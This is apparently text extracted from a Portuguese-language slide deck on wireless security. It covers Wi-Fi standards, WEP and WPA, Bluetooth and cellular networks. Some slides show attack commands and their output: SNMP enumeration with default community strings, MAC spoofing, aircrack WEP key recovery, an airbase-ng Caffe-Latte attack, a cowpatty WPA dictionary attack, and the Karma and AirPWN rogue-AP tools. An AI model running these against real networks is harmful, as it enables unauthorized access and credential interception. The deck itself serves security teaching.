Segurança em redes sem fio
Segurança em redes sem fio
● Analista de segurança desde 1992
● Pesquisador em áreas como Forense Computacional, Smartcards, Redes sem fio e Pen-Test.
● Coordenador de grupos de resposta à incidentes em governo e iniciativa privada
● Livros sobre Segurança de rede e Redes sem fio (Wifi e Bluetooth)
● Auditor da AC Raiz da ICP-Brasil
● Autor e Co-autor de ferramentas como Chkrootkit, BTSearch e Beholder.
PerfilPerfil
AgendaAgenda
● Definições de redes sem fio● Principais características ● Aspectos de segurança
● Wi-Fi● Bluetooth ● Infravermelho ● WiMax ● RFID● Celular (GSM/TDMA/CDMA, etc.)● ZigBee (802.15.4)● UWB (802.15.3)● Wibree (Nokia)
“Alcance padrão de 10 a 250 metros”
© wifi toys
Bluetooth
“Alcance padrão de 10 a 250 metros”
Bluetooth
Wi-Fi usa faixa Industrial, Scentific&Medical (ISM) 902 928 MHz 2.4 2.485 GHz (2.4 a 2.5 GHz no Brasil) 5.150 5.825 GHz
WiMax (802.16/a) usam faixas licenciadas (10-66/2-10Ghz)
Características de redes Wi-Fi
Características de redes Wi-Fi Características de redes Wi-Fi
● IEEE 802.11 Padrões atuais:
802.11b 11Mb 2.4Ghz802.11a 54Mb 5.1GHz802.11g 54Mb 2.4Ghz 802.11i - Mecanismos de segurança 802.1x – Mecanismos de autenticação, uso
em redes cabeadas e sem fio802.11n – Aumento da velocidade, 108Mb
nominais.
Canais - 802.11b
Canal Freqüência 1 2.412 2 2.417 3 2.422 4 2.427 5 2.432 6 2.437 7 2.442 8 2.447 9 2.452 10 2.457 11 2.462 12 2.467 13 2.472 14 2.484
Canais - 802.11a/b/g
$ iwlist wlan0 freqwlan0 24 channels in total; available frequencies : Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 09 : 2.452 GHz Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz
Channel 36 : 5.18 GHz Channel 40 : 5.2 GHz Channel 44 : 5.22 GHz Channel 48 : 5.24 GHz Channel 52 : 5.26 GHz Channel 56 : 5.28 GHz Channel 60 : 5.3 GHz Channel 64 : 5.32 GHz Channel 149 : 5.745 GHz Channel 153 : 5.765 GHz Channel 157 : 5.785 GHz Channel 161 : 5.805 GHz Channel 165 : 5.825 GHz Current Frequency=2.422 GHz (Channel 3)
Modelos de uso
Ad-Hoc
Infraestrutura
Modelos de uso
Rede Aberta – Broadcast SSID
Modelos de uso
Nome da rede
Rede Aberta – Broadcast SSID
Modelos de uso
# iwlist wlan0 scan wlan0 Scan completed : Cell 01 - Address: 00:07:40:XX:XX:XX ESSID:"PAIVA" Mode:Master Channel:3 Frequency:2.422 GHz (Channel 3) Quality=61/100 Signal level=-71 dBm Noise level=-86 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s 48 Mb/s; 54 Mb/s
Cell 02 - Address: 00:15:E9:XX:XX:XX ESSID:"tamires" Mode:Master Channel:6 Frequency:2.437 GHz (Channel 6) Quality=51/100 Signal level=-78 dBm Noise level=-93 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s 48 Mb/s; 54 Mb/s
Rede Aberta – Broadcast SSID
Modelos de uso
# iwlist wlan0 scan wlan0 Scan completed : Cell 01 - Address: 00:07:40:XX:XX:XX ESSID:"PAIVA" Mode:Master Channel:3 Frequency:2.422 GHz (Channel 3) Quality=61/100 Signal level=-71 dBm Noise level=-86 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s 48 Mb/s; 54 Mb/s
Cell 02 - Address: 00:15:E9:XX:XX:XX ESSID:"tamires" Mode:Master Channel:6 Frequency:2.437 GHz (Channel 6) Quality=51/100 Signal level=-78 dBm Noise level=-93 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s 48 Mb/s; 54 Mb/s
Rede Aberta – Broadcast SSID
Modelos de uso
# iwlist wlan0 scan wlan0 Scan completed : Cell 01 - Address: 00:07:40:XX:XX:XX ESSID:"PAIVA" Mode:Master Channel:3 Frequency:2.422 GHz (Channel 3) Quality=61/100 Signal level=-71 dBm Noise level=-86 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s 48 Mb/s; 54 Mb/s
Cell 02 - Address: 00:15:E9:XX:XX:XX ESSID:"tamires" Mode:Master Channel:6 Frequency:2.437 GHz (Channel 6) Quality=51/100 Signal level=-78 dBm Noise level=-93 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s 48 Mb/s; 54 Mb/s
Rede Fechada – Broadcast desabilitado
Modelos de uso
09:46:02 2422 202dB Beacon () ESS CH: 109:46:02 2422 201dB Beacon () ESS CH: 109:46:02 2422 198dB Beacon () ESS CH: 109:51:00 2422 184dB Beacon (dlink) ESS CH: 1109:51:01 2422 185dB Beacon (dlink) ESS CH: 1109:51:01 2422 186dB Beacon(drink) ESS CH: 11
Nome da rede
Rede Fechada – Broadcast desabilitado
Modelos de uso
# iwlist wlan0 scan Cell 02 - Address: 00:13:60:7D:CF:10 ESSID:"" Mode:Master Channel:5 Frequency:2.432 GHz (Channel 5) Quality=42/100 Signal level=-84 dBm Noise level=-127 dBm Encryption key:on IE: WPA Version 1 Group Cipher : TKIP Pairwise Ciphers (1) : TKIP Authentication Suites (1) : 802.1x Cell 03 - Address: 00:14:6A:7C:15:B0 ESSID:"" Mode:Master Channel:44 Frequency:5.22 GHz (Channel 44) Quality=52/100 Signal level=-72 dBm Noise level=-93 dBm Encryption key:on IE: WPA Version 1 Group Cipher : TKIP Pairwise Ciphers (1) : TKIP Authentication Suites (1) : PSK
Wired Equivalent Privacy - WEP
Wi-Fi Protected Access - WPA
● Disponível antes do padrão 802.11i
● Dois tipos– WPA-PSK(2) - Chave previamente compartilhada
– WPA(2) – Enterprise (exige 802.1x)
WPA(2) - PSKWPA(2) - PSKchaves previamente compatilhadaschaves previamente compatilhadas
802.1x (Extensible Authentication Protocol - EAP)
WPA/WPA2WPA/WPA2EnterpriseEnterprise
anapedrojonasjose...
login: anapassword: ********
802.1x
Redes sem fioPrincipais problemas
Configuração padrão (senhas, nome da rede, uso de DHCP, SNMP, etc)
Métodos de filtragem ineficientes Fragilidade do modelo WEP Escuta do tráfego Negação de serviço Problemas com WPA e 802.1x
Configurações de fábrica
Configurações de fábrica - SNMPsnmpwalk -Os -c public -v 1 192.168.0.1 system
sysDescr.0 = STRING: Netgear ProSafe DualBand Wireless Firewall FWAG114
sysObjectID.0 = OID: enterprises.0sysUpTime.0 = Timeticks: (699775) 1:56:37.75
sysContact.0 = STRING:http://www.netgear.comsysName.0 = STRING:sysLocation.0 = STRING:sysServices.0 = INTEGER: 6
snmpwalk -On -c public -v 1 192.168.0.1 .1.3.6.1.2.1.4.22.1.2.3.1.3.6.1.2.1.4.22.1.2.3.192.168.0.5 = STRING: 0:c:41:a:25:20.1.3.6.1.2.1.4.22.1.2.3.192.168.0.2 = STRING: 8:0:46:ba:8:cb.1.3.6.1.2.1.4.22.1.2.3.192.168.0.3 = STRING: 0:50:56:c0:0:1 .1.3.6.1.2.1.4.22.1.2.3.192.168.0.4 = STRING: 0:15:0:41:9d:e5.1.3.6.1.2.1.4.22.1.2.3.192.168.0.6 = STRING: 0:d0:c4:1d:25:20.1.3.6.1.2.1.4.22.1.2.3.192.168.0.8 = STRING: 0:22:2d:2b:e3:1d.1.3.6.1.2.1.4.22.1.2.3.192.168.0.7 = STRING: 0:04:e2:8c:38:04.1.3.6.1.2.1.4.22.1.2.3.192.168.0.11 = STRING: 1:03:dc:c1:17:d9.1.3.6.1.2.1.4.22.1.2.3.192.168.0.9 = STRING: 0:0c:df:29:1d:60 .1.3.6.1.2.1.4.22.1.2.3.192.168.0.10 = STRING: 0:a4:9:a5:b1:10
Configurações de fábrica - SNMP
Desabilitar difusão de SSID
Desabilitar difusão de SSID
Desabilitar difusão de SSID
23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.802928 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.831746 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.873675 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.887420 Assoc Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
Desabilitar difusão de SSID
CH 10 ][ Elapsed: 9 mins ][ 2009-08-28 14:24 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:07:40:4D:1A:5C 103 322 522 0 3 54 WEP WEP Homenet54 00:19:E0:64:DC:10 101 330 3 0 11 11 . WPA2 CCMP PSK PCSL 00:1F:33:CD:CA:4A 101 177 0 0 11 54 . WPA TKIP PSK NETGEAR 00:1B:11:50:2F:2E 86 461 24 0 6 54 . WEP WEP OPN dlink 00:16:B6:47:CF:B9 -1 0 570 0 6 -1 OPN <length: 0> BSSID STATION PWR Rate Lost Packets Probes 00:07:40:4D:1A:5C 00:1B:77:7B:82:27 89 11 - 1 107 623 00:16:B6:47:CF:B9 00:23:12:05:64:C1 104 0 - 5 62 1343 linksys
Nome da rede
$ ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:0C:41:E3:5F:5A inet addr:192.168.11.3 Bcast:192.168.11.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:842 errors:0 dropped:0 overruns:0 frame:0 TX packets:637 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:152984 (149.3 KiB) TX bytes:69539 (67.9 KiB)
c:\> ipconfig /all Windows 2000 IP Configuration [...] Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : xxx.com.br Description . . . . . . . . . . . : 3Com EtherLink XL 10/100 PCIFor Complete PC Management NIC (3C905C-TX) Physical Address. . . . . . . . . : 00-04-76-16-3F-DB
Filtro por MAC
Filtro por MAC
Filtro por MAC
Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01
FreeBSD # ifconfig xl3 ether 00:00:00:00:00:01
OpenBSD/NetBSD# wiconfig wi0 -m 00:00:00:00:00:01
Filtro por MAC
Filtro por MAC
WEP
# time aircrack trafego.cap (72MB bytes ~3 horas de captura) aircrack 2.1 * Got 264394! unique IVs | fudge factor = 2 * Elapsed time [00:00:01] | tried 0 keys at 0 k/mKB depth votes0 0/ 2 46( 28) 20( 15) 97( 13) D8( 12) DB( 10) BE( 8) 38( 5) 1 0/ 2 41( 30) 97( 18) 4D( 13) D8( 13) 7E( 12) 91( 12) 86( 9) 2 0/ 2 4E( 65) 51( 55) 0F( 15) 48( 15) B3( 15) 53( 9) F0( 5) 3 0/ 2 54( 58) E9( 48) DA( 28) F6( 21) F3( 16) D1( 15) F4( 15) 4 0/ 1 41( 174) 5F( 41) 9A( 28) 9B( 24) 50( 22) A4( 21) F5( 21) KEY FOUND! [ 46414E5441 ]real 0m31.939suser 0m0.706ssys 0m0.533s
Fragilidade do WEP
AP desligado
AP desligado
AP Desligado airbase-ng -c 11 -L -e virus.exe -W 1 wlan1 23:11:31 Created tap interface at023:11:31 Access Point with BSSID 00:21:29:65:B8:45 started.23:12:25 Got 140 bytes keystream: 00:23:12:D7:DA:F823:12:25 SKA from 00:23:12:D7:DA:F823:12:25 Client 00:23:12:D7:DA:F8 associated (WEP) to ESSID: "virus.exe"23:12:25 Starting Caffe-Latte attack against 00:23:12:D7:DA:F8 at 100 pps.23:12:36 Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"23:12:36 Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"23:12:36 Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"
AP Desligado
airbase-ng -c 11 -L -e virus.exe -W 1 wlan1 23:11:31 Created tap interface at023:11:31 Access Point with BSSID 00:21:29:65:B8:45 started.23:12:25 Got 140 bytes keystream: 00:23:12:D7:DA:F823:12:25 SKA from 00:23:12:D7:DA:F823:12:25 Client 00:23:12:D7:DA:F8 associated (WEP) to ESSID: "virus.exe"23:12:25 Starting Caffe-Latte attack against 00:23:12:D7:DA:F8 at 100 pps.23:12:36 Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"23:12:36 Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"23:12:36 Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"
Escuta de tráfego – Rede aberta
# tcpdump -i eth0 -s 1700tcpdump: WARNING: eth0: no IPv4 address assigned tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1700 bytes17:09:38.193741 IP (tos 0x0, ttl 128, id 49930, offset 0, flags [DF], length: 48)192.168.11.2.3597 > 200.155.13.26.http: S [tcp sum ok] 3524687372:3524687372(0) win 16384 <mss 1460,nop,nop,sackOK>
Negação de serviço - DoS
DoS – Interferência
DoS – Interferência
# cowpatty -f /usr/share/dict/word -r trafego.log -s NETGEARcowpatty 2.0 - WPA-PSK dictionary attack. <[email protected]>Collected all necessary data to mount crack against passphrase.Starting dictionary attack. Please be patient.
Problemas com WPA
# tcpdump -w trafego.log
Karma
KARMA includes patches for the Linux MADWifi driver to allow the creation of an 802.11 Access Point that responds to any probed SSID. So if a client looks for 'linksys', it is 'linksys' to them (even while it may be 'tmobile' to someone else). Operating in this fashion has revealed vulnerabilities in how Windows XP and MacOS X look for networks, so clients may join even if their preferred networks list is empty.
● Fornece DHCP ● Captura credênciais POP3/FTP● Redireciona HTTP para server malicioso ou atua como proxy transparente
● Fornece DHCP ● Captura credênciais POP3/FTP● Redireciona HTTP para server malicioso ou atua como proxy transparente
AirPWN
..The configurations were:
* HTTP 100% of the screen * HTTP replacing all images * HTTP background via CSS
* HTTP "owned" graphic, replacing all images * HTTP javascript alert boxes, letting people know just how pwned they were * FTP banners (while this worked, nobody pays attention to FTP banners so we abandoned this quickly)
AirPWN
..The configurations were:
* HTTP 100% of the screen * HTTP replacing all images * HTTP background via CSS
* HTTP "owned" graphic, replacing all images * HTTP javascript alert boxes, letting people know just how pwned they were * FTP banners (while this worked, nobody pays attention to FTP banners so we abandoned this quickly)
AirPWN
..The configurations were:
* HTTP 100% of the screen * HTTP replacing all images * HTTP background via CSS
* HTTP "owned" graphic, replacing all images * HTTP javascript alert boxes, letting people know just how pwned they were * FTP banners (while this worked, nobody pays attention to FTP banners so we abandoned this quickly)
Facilidade de acesso
Rede aberta com DHCP ativo
Rede aberto sem DHCP ativo
Controle de acesso baseado em IP e/ou endereço MAC
Uso de WEP
Uso de WPA-PSK
Uso de 802.1x (usuário/senha)
Fácil
Difícil
GSM 3GGSM 3G
GSM 2.5G x 3G
Redes de dados: GPRS/EDGEFreqüências: 850, 900, 1800, 1900 MHzVelocidade: 384Kbps
Redes de dados: HSDPA/UMTSFreqüências: 850, 1900, 2100 MHzVelocidade: 7.2 Mbps
GSM 2.5GGSM 2.5G
3GPartnershipProject (4G)
(Long Term Evolution)
Velocidade: 326.4 Mbit/s
LTELTE
Bluetooth
Freqüência: 2.4 MHzVelocidade: 2.0 KbpsDistâncias: 10-250 Mts
Ponto a ponto Uso de concentrador7 + 1 participantes
CaracterísticasCaracterísticas
Tipo de RedeTipo de Rede
Wireless Access in Vehicular EnvironmentsWireless Access in Vehicular Environments (WAVE) (WAVE)
Permite comunicação veículo-p/-veículo (V2V) e veículo-p/-infraesttrutura (V2I)
Feito para funcionar em situações adversas com baixa latência, distâncias médias e alta mobilidade
Wireless Access in Vehicular EnvironmentsWireless Access in Vehicular Environments (WAVE) (WAVE)
Wireless Access in Vehicular EnvironmentsWireless Access in Vehicular Environments (WAVE) (WAVE)